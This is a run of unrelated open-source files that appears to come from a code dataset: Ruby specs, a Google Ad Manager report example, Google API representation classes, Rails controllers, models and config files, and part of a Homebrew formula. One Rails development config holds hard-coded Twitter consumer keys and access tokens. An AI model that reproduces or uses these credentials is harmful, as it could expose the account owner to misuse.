end
end
context 'non-existing proceeding type' do
let(:code) { 'XX024' }
it 'raises' do
expect { subject }.to raise_error KeyError, 'key not found: :XX024'
end
end
end
end
end
| 23.285714 | 77 | 0.558282 |
03545b61d4a697f95c260c0abc15345d6d728e2e | 3,476 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2011, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example runs a report similar to the "Orders report" on the Ad Manager
# website with additional attributes and can filter to include just one order.
# To download the report see download_report.rb.
require 'ad_manager_api'
def run_delivery_report(ad_manager, order_id)
# Get the ReportService.
report_service = ad_manager.service(:ReportService, API_VERSION)
# Specify a report to run for the last 7 days.
report_end_date = ad_manager.today()
report_start_date = report_end_date - 7
# Create statement object to filter for an order.
statement = ad_manager.new_report_statement_builder do |sb|
sb.where = 'ORDER_ID = :order_id'
sb.with_bind_variable('order_id', order_id)
end
# Create report query.
report_query = {
:date_range_type => 'CUSTOM_DATE',
:start_date => report_start_date.to_h,
:end_date => report_end_date.to_h,
:dimensions => ['ORDER_ID', 'ORDER_NAME'],
:dimension_attributes => ['ORDER_TRAFFICKER', 'ORDER_START_DATE_TIME',
'ORDER_END_DATE_TIME'],
:columns => ['AD_SERVER_IMPRESSIONS', 'AD_SERVER_CLICKS', 'AD_SERVER_CTR',
'AD_SERVER_CPM_AND_CPC_REVENUE', 'AD_SERVER_WITHOUT_CPD_AVERAGE_ECPM'],
:statement => statement.to_statement()
}
# Create report job.
report_job = {:report_query => report_query}
# Run report job.
report_job = report_service.run_report_job(report_job)
MAX_RETRIES.times do |retry_count|
# Get the report job status.
report_job_status = report_service.get_report_job_status(report_job[:id])
break unless report_job_status == 'IN_PROGRESS'
puts 'Report with ID %d is still running.' % report_job[:id]
sleep(RETRY_INTERVAL)
end
puts 'Report job with ID %d finished with status "%s".' % [report_job[:id],
report_service.get_report_job_status(report_job[:id])]
end
if __FILE__ == $0
API_VERSION = :v202102
MAX_RETRIES = 10
RETRY_INTERVAL = 30
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
order_id = 'INSERT_ORDER_ID_HERE'.to_i
run_delivery_report(ad_manager, order_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 33.747573 | 79 | 0.701381 |
eddb3fa42662c6c8bc3bb5f75b95f6dc7ccb5f97 | 10,485 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module CloudresourcemanagerV1beta1
class FolderOperationError
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListProjectsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UndeleteProjectRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FolderOperation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetIamPolicyRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SetIamPolicyRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TestIamPermissionsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Organization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Policy
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ProjectCreationStatus
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TestIamPermissionsRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListOrganizationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetAncestryRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetAncestryResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Empty
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Ancestor
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ResourceId
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Project
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Binding
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OrganizationOwner
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FolderOperationError
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :error_message_id, as: 'errorMessageId'
end
end
class ListProjectsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :projects, as: 'projects', class: Google::Apis::CloudresourcemanagerV1beta1::Project, decorator: Google::Apis::CloudresourcemanagerV1beta1::Project::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class UndeleteProjectRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class FolderOperation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
property :source_parent, as: 'sourceParent'
property :destination_parent, as: 'destinationParent'
property :operation_type, as: 'operationType'
end
end
class GetIamPolicyRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class SetIamPolicyRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :policy, as: 'policy', class: Google::Apis::CloudresourcemanagerV1beta1::Policy, decorator: Google::Apis::CloudresourcemanagerV1beta1::Policy::Representation
end
end
class TestIamPermissionsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :permissions, as: 'permissions'
end
end
class Organization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :lifecycle_state, as: 'lifecycleState'
property :display_name, as: 'displayName'
property :organization_id, as: 'organizationId'
property :name, as: 'name'
property :creation_time, as: 'creationTime'
property :owner, as: 'owner', class: Google::Apis::CloudresourcemanagerV1beta1::OrganizationOwner, decorator: Google::Apis::CloudresourcemanagerV1beta1::OrganizationOwner::Representation
end
end
class Policy
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :bindings, as: 'bindings', class: Google::Apis::CloudresourcemanagerV1beta1::Binding, decorator: Google::Apis::CloudresourcemanagerV1beta1::Binding::Representation
property :etag, :base64 => true, as: 'etag'
property :version, as: 'version'
end
end
class ProjectCreationStatus
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ready, as: 'ready'
property :gettable, as: 'gettable'
property :create_time, as: 'createTime'
end
end
class TestIamPermissionsRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :permissions, as: 'permissions'
end
end
class ListOrganizationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :organizations, as: 'organizations', class: Google::Apis::CloudresourcemanagerV1beta1::Organization, decorator: Google::Apis::CloudresourcemanagerV1beta1::Organization::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class GetAncestryRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class GetAncestryResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ancestor, as: 'ancestor', class: Google::Apis::CloudresourcemanagerV1beta1::Ancestor, decorator: Google::Apis::CloudresourcemanagerV1beta1::Ancestor::Representation
end
end
class Empty
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class Ancestor
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :resource_id, as: 'resourceId', class: Google::Apis::CloudresourcemanagerV1beta1::ResourceId, decorator: Google::Apis::CloudresourcemanagerV1beta1::ResourceId::Representation
end
end
class ResourceId
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :type, as: 'type'
property :id, as: 'id'
end
end
class Project
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :parent, as: 'parent', class: Google::Apis::CloudresourcemanagerV1beta1::ResourceId, decorator: Google::Apis::CloudresourcemanagerV1beta1::ResourceId::Representation
hash :labels, as: 'labels'
property :lifecycle_state, as: 'lifecycleState'
property :create_time, as: 'createTime'
property :name, as: 'name'
property :project_number, as: 'projectNumber'
property :project_id, as: 'projectId'
end
end
class Binding
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :members, as: 'members'
property :role, as: 'role'
end
end
class OrganizationOwner
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :directory_customer_id, as: 'directoryCustomerId'
end
end
end
end
end
| 33.498403 | 204 | 0.645875 |
915397f0f4f9fac2798fd38cf153ca313d0de04f | 1,840 | # frozen_string_literal: true
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20180913142237_schedule_digest_personal_access_tokens.rb')
describe ScheduleDigestPersonalAccessTokens, :migration do
let(:personal_access_tokens) { table(:personal_access_tokens) }
let(:users) { table(:users) }
before do
stub_const("#{described_class.name}::BATCH_SIZE", 4)
users.create(id: 1, email: '[email protected]', projects_limit: 10)
personal_access_tokens.create!(id: 1, user_id: 1, name: 'pat-01', token: 'token-01')
personal_access_tokens.create!(id: 2, user_id: 1, name: 'pat-02', token: 'token-02')
personal_access_tokens.create!(id: 3, user_id: 1, name: 'pat-03', token_digest: 'token_digest')
personal_access_tokens.create!(id: 4, user_id: 1, name: 'pat-04', token: 'token-04')
personal_access_tokens.create!(id: 5, user_id: 1, name: 'pat-05', token: 'token-05')
personal_access_tokens.create!(id: 6, user_id: 1, name: 'pat-06', token: 'token-06')
end
it 'correctly schedules background migrations' do
Sidekiq::Testing.fake! do
migrate!
expect(described_class::MIGRATION).to(
be_scheduled_delayed_migration(
5.minutes, 'PersonalAccessToken', 'token', 'token_digest', 1, 5))
expect(described_class::MIGRATION).to(
be_scheduled_delayed_migration(
10.minutes, 'PersonalAccessToken', 'token', 'token_digest', 6, 6))
expect(BackgroundMigrationWorker.jobs.size).to eq 2
end
end
it 'schedules background migrations', :sidekiq_might_not_need_inline do
perform_enqueued_jobs do
plain_text_token = 'token IS NOT NULL'
expect(personal_access_tokens.where(plain_text_token).count).to eq 5
migrate!
expect(personal_access_tokens.where(plain_text_token).count).to eq 0
end
end
end
| 37.55102 | 105 | 0.713043 |
e81aa9c72042af7a65b26fb754ef211c4a9dcd5e | 177 | class Message < ApplicationRecord
belongs_to :user
belongs_to :room
validates_presence_of :content
validates_presence_of :user_id
validates_presence_of :room_id
end | 17.7 | 33 | 0.813559 |
ac2d9ca289b481af55a17af0d9192145f700547e | 134 | require "classnames/version"
require "classnames/classnames"
def Classnames(*classes)
Classnames::Classnames.new(classes).to_s
end
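# Hedged usage sketch: the exact return value depends on Classnames::Classnames
# (required above but not shown here), so the joined string below is an
# assumption for illustration only.
#
#   Classnames("btn", "btn-primary") # => e.g. "btn btn-primary"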
| 19.142857 | 42 | 0.80597 |
ed4d261781e70f72f2f8909722dc949a089d8386 | 1,553 | class Buyers::DeliveriesController < ApplicationController
after_action :verify_authorized
layout 'buyers'
def index
authorize(current_rfp, :edit?)
@deliveries = current_rfp.deliveries
end
def new
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.build
end
def edit
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.find(params[:id])
end
def create
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.build(delivery_params)
if @delivery.save
flash[:success] = 'Schedule was successfully created.'
redirect_to buyers_rfp_deliveries_path(current_rfp)
else
flash[:alert] = 'Schedule could not be saved.'
render :new
end
end
def update
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.find(params[:id])
if @delivery.update(delivery_params)
flash[:success] = 'Schedule was successfully saved.'
redirect_to buyers_rfp_deliveries_path(current_rfp)
else
flash[:alert] = 'Schedule could not be saved.'
render :edit
end
end
def destroy
authorize(current_rfp, :edit?)
schedule = current_rfp.deliveries.find(params[:id])
schedule.destroy
redirect_to buyers_rfp_deliveries_path(current_rfp)
end
private
def delivery_params
params.require(:delivery).permit(:location_id, :deliveries_per_week, :window_start_time, :window_end_time, delivery_days: [])
end
def current_rfp
@current_rfp ||= Rfp.find(params[:rfp_id])
end
end
| 25.459016 | 129 | 0.71217 |
28d655cd0597ce8158f268eb332081dec9d35c08 | 43 | module HideAndSeek
VERSION = "0.2.1"
end
| 10.75 | 19 | 0.697674 |
33a6ab959e570646e26ec5310f92b1da02b47894 | 1,967 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# Adds additional error checking when serving assets at runtime.
# Checks for improperly declared sprockets dependencies.
# Raises helpful error messages.
config.assets.raise_runtime_errors = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# use tweet bot
config.tweet_host = "localhost"
config.tweet_consumer_key = "zYrvDAVNm0QRfdGkOVXOh55MX"
config.tweet_consumer_secret = "Efttcdt6pdLeIw1X6hnbX5LrgVRDbc4y0SodePYeBE01DmLjw2"
config.tweet_access_token = "209984728-0heNNNwAcN4t8YrrNG5JoYsK4ujYpE7TIKDuZmCQ"
config.tweet_access_token_secret = "zHD8sx6TT5MyxHHEYT1axnRYDABhTC02GsS7FhofZyAHG"
end
| 40.142857 | 85 | 0.788002 |
6292e3e4182a886953d80ee11c365a83dd76afcb | 1,990 | module ProMotion
module Table
module Refreshable
def make_refreshable(params={})
pull_message = params[:pull_message] || "Pull to refresh"
@refreshing = params[:refreshing] || "Refreshing data..."
@updated_format = params[:updated_format] || "Last updated at %s"
@updated_time_format = params[:updated_time_format] || "%l:%M %p"
@refreshable_callback = params[:callback] || :on_refresh
@refresh_control = UIRefreshControl.alloc.init
@refresh_control.attributedTitle = NSAttributedString.alloc.initWithString(pull_message)
@refresh_control.addTarget(self, action:'refreshView:', forControlEvents:UIControlEventValueChanged)
self.refreshControl = @refresh_control
end
def start_refreshing
return unless @refresh_control
@refresh_control.beginRefreshing
        # Scrolls the table down to show the refresh control when invoked programmatically
tableView.setContentOffset(CGPointMake(0, tableView.contentOffset.y-@refresh_control.frame.size.height), animated:true) if tableView.contentOffset.y > -65.0
end
alias :begin_refreshing :start_refreshing
def end_refreshing
return unless @refresh_control
@refresh_control.attributedTitle = NSAttributedString.alloc.initWithString(sprintf(@updated_format, Time.now.strftime(@updated_time_format)))
@refresh_control.endRefreshing
end
alias :stop_refreshing :end_refreshing
######### iOS methods, headless camel case #######
# UIRefreshControl Delegates
def refreshView(refresh)
refresh.attributedTitle = NSAttributedString.alloc.initWithString(@refreshing)
if @refreshable_callback && self.respond_to?(@refreshable_callback)
self.send(@refreshable_callback)
else
mp "You must implement the '#{@refreshable_callback}' method in your TableScreen.", force_color: :yellow
end
end
end
end
end
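# Hedged usage sketch (assumptions: a ProMotion TableScreen that mixes in this
# module; the screen class, messages and on_refresh body are illustrative only).
#
#   class EventsScreen < PM::TableScreen
#     def on_load
#       make_refreshable(
#         pull_message: "Pull to refresh events",
#         refreshing:   "Loading events...",
#         callback:     :on_refresh
#       )
#     end
#     def on_refresh
#       # Reload data here, then stop the spinner and redraw the table:
#       end_refreshing
#       update_table_data
#     end
#   end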
| 39.8 | 164 | 0.705025 |
d59f6fda31dba4da327135a67fa8872f84897e6c | 5,512 | class PerconaServerAT55 < Formula
desc "Drop-in MySQL replacement"
homepage "https://www.percona.com/"
url "https://www.percona.com/downloads/Percona-Server-5.5/Percona-Server-5.5.57-38.9/source/tarball/percona-server-5.5.57-38.9.tar.gz"
version "5.5.57-38.9"
sha256 "253f5c254b038c0622055dc8f0259a517be58736cfdb2eefebcba028a8c58da4"
bottle do
rebuild 1
sha256 "fbe85feed350b63a74bd0271ba97873ecd60a1e79c8d1dac1b3a2708e49d52c3" => :high_sierra
sha256 "6e983264db4df69a954d7232e908bbc7bd283d058a8831b9c9fe4f907f55e417" => :sierra
sha256 "0f6b7b056117903982a979fd68c0a1a74279dac6fe941d27d1d217ad2ebfdc8a" => :el_capitan
sha256 "5a4743c33b2e5fc3546b82cb267f60ca35b16eb20b5635df468a470c2fa90999" => :yosemite
end
keg_only :versioned_formula
option "with-test", "Build with unit tests"
option "with-embedded", "Build the embedded server"
option "with-libedit", "Compile with editline wrapper instead of readline"
option "with-local-infile", "Build with local infile loading support"
deprecated_option "enable-local-infile" => "with-local-infile"
deprecated_option "with-tests" => "with-test"
depends_on "cmake" => :build
depends_on "readline"
depends_on "pidof"
depends_on "openssl"
# Where the database files should be located. Existing installs have them
# under var/percona, but going forward they will be under var/mysql to be
# shared with the mysql and mariadb formulae.
def datadir
@datadir ||= (var/"percona").directory? ? var/"percona" : var/"mysql"
end
pour_bottle? do
reason "The bottle needs a var/mysql datadir (yours is var/percona)."
satisfy { datadir == var/"mysql" }
end
def install
args = std_cmake_args + %W[
-DMYSQL_DATADIR=#{datadir}
-DINSTALL_PLUGINDIR=lib/plugin
-DSYSCONFDIR=#{etc}
-DINSTALL_MANDIR=#{man}
-DINSTALL_DOCDIR=#{doc}
-DINSTALL_INFODIR=#{info}
-DINSTALL_INCLUDEDIR=include/mysql
-DINSTALL_MYSQLSHAREDIR=#{share.basename}/mysql
-DWITH_SSL=yes
-DDEFAULT_CHARSET=utf8
-DDEFAULT_COLLATION=utf8_general_ci
-DCOMPILATION_COMMENT=Homebrew
-DWITH_EDITLINE=system
]
# PAM plugin is Linux-only at the moment
args.concat %w[
-DWITHOUT_AUTH_PAM=1
-DWITHOUT_AUTH_PAM_COMPAT=1
-DWITHOUT_DIALOG=1
]
# To enable unit testing at build, we need to download the unit testing suite
if build.with? "tests"
args << "-DENABLE_DOWNLOADS=ON"
else
args << "-DWITH_UNIT_TESTS=OFF"
end
# Build the embedded server
args << "-DWITH_EMBEDDED_SERVER=ON" if build.with? "embedded"
# Compile with readline unless libedit is explicitly chosen
args << "-DWITH_READLINE=yes" if build.without? "libedit"
# Build with local infile loading support
args << "-DENABLED_LOCAL_INFILE=1" if build.include? "enable-local-infile"
system "cmake", *args
system "make"
system "make", "install"
# Don't create databases inside of the prefix!
# See: https://github.com/mxcl/homebrew/issues/4975
rm_rf prefix+"data"
# Link the setup script into bin
ln_s prefix+"scripts/mysql_install_db", bin+"mysql_install_db"
# Fix up the control script and link into bin
inreplace "#{prefix}/support-files/mysql.server",
/^(PATH=".*)(")/, "\\1:#{HOMEBREW_PREFIX}/bin\\2"
ln_s "#{prefix}/support-files/mysql.server", bin
# Move mysqlaccess to libexec
libexec.mkpath
mv "#{bin}/mysqlaccess", libexec
mv "#{bin}/mysqlaccess.conf", libexec
# Install my.cnf that binds to 127.0.0.1 by default
(buildpath/"my.cnf").write <<-EOS.undent
# Default Homebrew MySQL server config
[mysqld]
# Only allow connections from localhost
bind-address = 127.0.0.1
EOS
etc.install "my.cnf"
end
def caveats; <<-EOS.undent
Set up databases to run AS YOUR USER ACCOUNT with:
unset TMPDIR
mysql_install_db --verbose --user=`whoami` --basedir="$(brew --prefix percona-server55)" --datadir=#{datadir} --tmpdir=/tmp
To set up base tables in another folder, or use a different user to run
    mysqld, view the help for mysql_install_db:
mysql_install_db --help
and view the MySQL documentation:
* https://dev.mysql.com/doc/refman/5.5/en/mysql-install-db.html
* https://dev.mysql.com/doc/refman/5.5/en/default-privileges.html
To run as, for instance, user "mysql", you may need to `sudo`:
sudo mysql_install_db ...options...
A "/etc/my.cnf" from another install may interfere with a Homebrew-built
server starting up correctly.
MySQL is configured to only allow connections from localhost by default
To connect:
mysql -uroot
EOS
end
plist_options :manual => "mysql.server start"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_prefix}/bin/mysqld_safe</string>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
</dict>
</plist>
EOS
end
test do
system "/bin/sh", "-n", "#{bin}/mysqld_safe"
(prefix/"mysql-test").cd do
system "./mysql-test-run.pl", "status", "--vardir=#{testpath}"
end
end
end
| 32.423529 | 136 | 0.681422 |
e83d94d1a087b33069060e40c1fd620509da7c23 | 474 | module Bane
module Behaviors
module Responders
# Accepts a connection, pauses a fixed duration, then closes the connection.
#
# Options:
# - duration: The number of seconds to wait before disconnect. Default: 30
class CloseAfterPause
def initialize(options = {})
@options = {duration: 30}.merge(options)
end
def serve(io)
sleep(@options[:duration])
end
end
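      # Hedged usage sketch (assumption: a bare TCPServer loop rather than
      # Bane's own launcher; the port number is illustrative only):
      #
      #   require 'socket'
      #   responder = CloseAfterPause.new(duration: 5)
      #   server = TCPServer.new(10_001)
      #   loop do
      #     client = server.accept
      #     responder.serve(client)
      #     client.close
      #   end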
end
end
end | 22.571429 | 83 | 0.597046 |
1c857a6e09dfb8db94ac1970f09bfa414454c3fb | 1,075 | module Admin
class BaseController < ApplicationController
layout 'admin'
before_action :only_admin_or_moderator
def make_admin
@info = Info.find_by_id(params[:id])
@user = User.find(@info.user_id)
@user.update_attributes(role: 'admin', admin: 'true')
@user.save
redirect_to '/admin/admins'
end
def ban_the_user
@infos = Info.all
@info = Info.find_by_id(params[:id])
      if @info.ban == false
        @info.update_attribute(:ban, true)
      else
        @info.update_attribute(:ban, false)
      end
redirect_to '/admin/admins'
end
def delete_user
@info = Info.find_by_id(params[:id])
@user = User.find(@info.user_id)
@user.destroy
respond_to do |format|
format.html { redirect_to '/admin/admins', notice: 'User was successfully destroyed.' }
end
end
private
def only_admin_or_moderator
      redirect_to root_path unless current_user.admin == true
end
end
end
| 22.87234 | 96 | 0.615814 |
0196ddc1e2bef6eea1ce41f030c64efd9b9f344e | 385 | # frozen_string_literal: true
module Api
module Exceptions
class AuthenticationError < StandardError; end
class LocationNotFound < StandardError; end
class UnauthorizedError < AuthenticationError; end
class InvalidTokenError < AuthenticationError; end
class ExpiredTokenError < AuthenticationError; end
class InvalidParameters < StandardError; end
end
end
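# Hedged usage sketch (assumptions: a hypothetical API base controller; the
# handler names below are illustrative and not defined in this module):
#
#   class Api::BaseController < ActionController::API
#     rescue_from Api::Exceptions::AuthenticationError, with: :render_unauthorized
#     rescue_from Api::Exceptions::LocationNotFound, with: :render_not_found
#     rescue_from Api::Exceptions::InvalidParameters, with: :render_unprocessable
#     private
#     def render_unauthorized(error)
#       render json: { error: error.message }, status: :unauthorized
#     end
#   end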
| 29.615385 | 54 | 0.787013 |
3815c26ddd328e090529a5b0561c2e271fa33413 | 1,341 | # DocumentCollection sync checks are throwing up some errors as follow:
# "documents shouldn't contain 'uuid'"
# Searching for these documents by uuid reveals a document in a strange state:
# The document will have only 1 edition and that edition state will be superseded
#
# To fix this we are going to manually set the state to `published` and then
# send them through the EditionUnpublisher to unpublish them with the
# PublishedInError reason id and an explanation. We have to first set the
# state to `published` because the Edition workflow only allows certain state
# transitions.
#
# We also send them through the PublishingApi to resync data in the content store
content_ids = %w[5f5299be-7631-11e4-a3cb-005056011aef 5d8ff850-7631-11e4-a3cb-005056011aef]
documents = Document.where(content_id: content_ids)
documents.each do |document|
first_edition = document.editions.first
first_edition.state = "published"
first_edition.save!
unpublisher = EditionUnpublisher.new(
first_edition,
unpublishing: { unpublishing_reason_id: UnpublishingReason::PublishedInError.id, explanation: "Published in error" },
)
puts "about to unpublish #{document.content_id}"
unpublisher.perform!
puts "unpublished in Whitehall"
puts "republishing to publishing api"
PublishingApiDocumentRepublishingWorker.new.perform(document.id)
puts "done"
end
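# Hedged follow-up check (an assumption, not part of the original task): print
# each edition's final state so the result can be eyeballed before trusting
# the republish to the publishing api.
documents.each do |document|
  edition = document.reload.editions.first
  puts "#{document.content_id}: edition state is now #{edition.state}"
end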
| 43.258065 | 121 | 0.788218 |
03054f5e96f3e32062ac6d656448edac8d21938a | 1,299 | # frozen_string_literal: true
class Reports::MonthlyProgressComponent < ViewComponent::Base
include AssetsHelper
include DashboardHelper
attr_reader :dimension
attr_reader :range
attr_reader :monthly_counts
attr_reader :total_counts
def initialize(dimension, service:)
@dimension = dimension
@monthly_counts = service.monthly_counts
@total_counts = service.total_counts
@region = service.region
@range = service.range.reverse_each
end
def diagnosis_group_class
classes = []
classes << dimension.diagnosis unless dimension.diagnosis == :all
classes << dimension.gender
classes.compact.join(":")
end
def display?
dimension.diagnosis == :all && dimension.gender == :all
end
def table(&block)
options = {class: ["progress-table", dimension.indicator, diagnosis_group_class]}
    options[:style] = "display:none" unless display?
tag.table(options, &block)
end
# The default diagnosis is the one we display at the top level on initial page load
def default_diagnosis
:all
end
def total_count
@total_counts.attributes[dimension.field]
end
def monthly_count(period)
counts = monthly_counts[period]
if counts
counts.attributes[dimension.field]
else
0
end
end
end
| 23.196429 | 85 | 0.712086 |
f7dcf1761cc5399cc4ce337624f4f365ef2ae168 | 143 | class AddSitemapStateToGnavMenuItems < ActiveRecord::Migration
def change
add_column :gnav_menu_items, :sitemap_state, :string
end
end
| 23.833333 | 62 | 0.804196 |
2192aa92668927c5c611b4b957236d8043903674 | 1,508 | #
# Be sure to run `pod spec lint ByteBackpacker.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
s.name = "ByteBackpacker"
s.version = "1.2.2"
s.summary = "ByteBackpacker is a small utility written in pure Swift to pack value types into a Byte array and unpack them back."
s.description = <<-DESC
ByteBackpacker is a small utility written in pure Swift to pack value types into a Byte array and unpack them back. Additionally, there is a Data (formerly NSData) extension to convert Data objects into a Byte array. Byte is a typealias for UInt8.
DESC
s.homepage = "https://github.com/michaeldorner/ByteBackpacker"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Michael Dorner" => "[email protected]" }
s.source = { :git => "https://github.com/michaeldorner/ByteBackpacker.git", :tag => s.version.to_s }
s.ios.deployment_target = "13.1"
s.osx.deployment_target = "10.15"
s.watchos.deployment_target = "6.0"
s.tvos.deployment_target = "13.1"
s.swift_version = '5.0'
s.requires_arc = true
s.source_files = "Sources/ByteBackpacker.swift"
#s.public_header_files = "Sources/ByteBackpacker.h"
end
| 45.69697 | 265 | 0.685013 |
6ac3dc25c3ee8a450e526a11c7cc1f642babf5b2 | 2,107 | class Mtools < Formula
desc "Tools for manipulating MSDOS files"
homepage "https://www.gnu.org/software/mtools/"
url "https://ftp.gnu.org/gnu/mtools/mtools-4.0.37.tar.gz"
mirror "https://ftpmirror.gnu.org/mtools/mtools-4.0.37.tar.gz"
sha256 "426dc3d15017aae8daf68c9119c0f5f2eafb30deb4a4b417d7d763c4ab728c7b"
license "GPL-3.0-or-later"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "d352b9c8e8b73a9edf872160a1d66c8db95a39906663515c19841911a1a1459c"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "5cdb00e80178db05baa29f038582d877ee2cf520106cd6fa40e37231ca59281f"
sha256 cellar: :any_skip_relocation, monterey: "6b2d36cecaf5a14e3d0aa9279a8717b5c282e0a2751dc6a1faf6a0995e7281d8"
sha256 cellar: :any_skip_relocation, big_sur: "eb20c7441d189658e48ee3aa63d7b24b578c3e4a01bd9613978a56933fed809e"
sha256 cellar: :any_skip_relocation, catalina: "7b0439da4380a0eb89e55fb8146cfc6381ab7acdd291ee247180b361f87de374"
sha256 cellar: :any_skip_relocation, x86_64_linux: "f7d94d7689040334732d7640cdaf37f7076caeb7bff7f78f6050aaba8ab55cf5"
end
